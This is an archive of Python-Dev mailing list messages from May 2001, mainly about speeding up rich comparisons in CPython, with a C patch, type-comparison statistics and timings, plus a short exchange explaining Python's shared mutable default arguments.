Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here from the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""


From guido@digicool.com  Tue May 15 22:36:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
 <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net>
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Tue May 15 21:59:56 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyType_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls of equally-typed
objects, followed by floats with 5%. Those calls together cover 93% of
the richcompare calls.

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is idle, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% calls with equally-typed objects, of
those 62% strings, 3% integers. Notice the 15% for tuples and types,
each.

So to speed-up the common case clearly means to speed-up string
comparisons. If I'd need to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Those two optimizations together would give a richcompare to 95% of
the objects in the IDLE case.

Regards,
Martin


From guido@digicool.com  Tue May 15 23:41:12 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@digicool.com  Tue May 15 22:51:00 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy@digicool.com  Tue May 15 18:26:54 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name lead me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the call are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against string type is
the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.

Jeremy


From jeremy@digicool.com  Tue May 15 18:41:58 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
 <20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I download one of the files, but the quicktime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the streaming version at the 100kbps to "work" where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry@digicool.com  Tue May 15 23:56:10 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
 <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy@digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name lead me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the call are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisions should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1 == is naturally, slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
										    

From tim.one@home.com  Wed May 16 00:49:03 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
That appears to be more often than not across all apps I've tried, from 60%
of PyObject_RichCompare calls to nearly 100%.


From tim.one@home.com  Wed May 16 01:01:05 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger. (but
tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)


From tim.one@home.com  Wed May 16 01:37:56 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where strings compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyType_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).


From greg@cosc.canterbury.ac.nz  Wed May 16 02:58:05 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one@home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From esr@thyrsus.com  Wed May 16 03:27:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg@cosc.canterbury.ac.nz>:
> Tim Peters <tim.one@home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one@home.com  Wed May 16 08:14:25 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.


From tim.one@home.com  Wed May 16 08:25:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 08:28:45 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
 Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 08:24:56 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
 <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
 <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then tried to see what it does, then
ignoring the breakpoint a few times. This is what I've found; I may
miss important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn does two
Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.

Regards,
Martin


From i_sofer@yahoo.com  Wed May 16 08:53:25 2001
From: i_sofer@yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

--=-uNM1Q6eCX9JH/wGWUYU9
Content-Type: text/plain

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explictly defined by the constructor.

I attach a piece of code that demostrates the problem

--=-uNM1Q6eCX9JH/wGWUYU9
Content-Type: text/x-python
Content-Disposition: attachment; filename=test.py
Content-Transfer-Encoding: 7bit

"""
Bug description:
    
A class is defined. in the __init__ method, we define an options "attribs" 
argument, which defaults to {}.

We create two instances of class foo, each of them without argument.

we then modify the attribs attribute in one of them. in a suprising manner, 
the change if reflected in BOTH instances, where it should only appear in the 
first one.

Workaround:

explictly define an empty dictionary as the argument, or define the empty dictionary
inside the method body.
    
"""


class foo:
    
    def __init__(self,attribs={}):
	self.attribs=attribs;
	return None;
    
print "";
print "Defining Two instances of class foo:";

print "a=foo()"
print "b=foo()"
a=foo();
b=foo();
print "";
print "The 'attribs' attribute of both looks like this:";
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs
print ""
print "Now we modify 'attribs' in a:"
print 'a.attribs["bug"]= "exists"';
a.attribs["bug"]= "exists";
print ""
print "Now, things should now look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % "{}";
print ""
print "However, things look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs


--=-uNM1Q6eCX9JH/wGWUYU9--


From martin@loewis.home.cs.tu-berlin.de  Wed May 16 09:02:01 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS python is in the 0.78 range, the different is
neglectable, though.

Regards,
Martin


From larsga@garshol.priv.no  Wed May 16 09:19:10 2001
From: larsga@garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explictly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated when the function/method is
compiled. You may consider the semantics ill-advised, but it is
intentional.
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}

--Lars M.


From fredrik@pythonware.com  Wed May 16 09:18:44 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explictly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one@home.com  Wed May 16 09:41:47 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

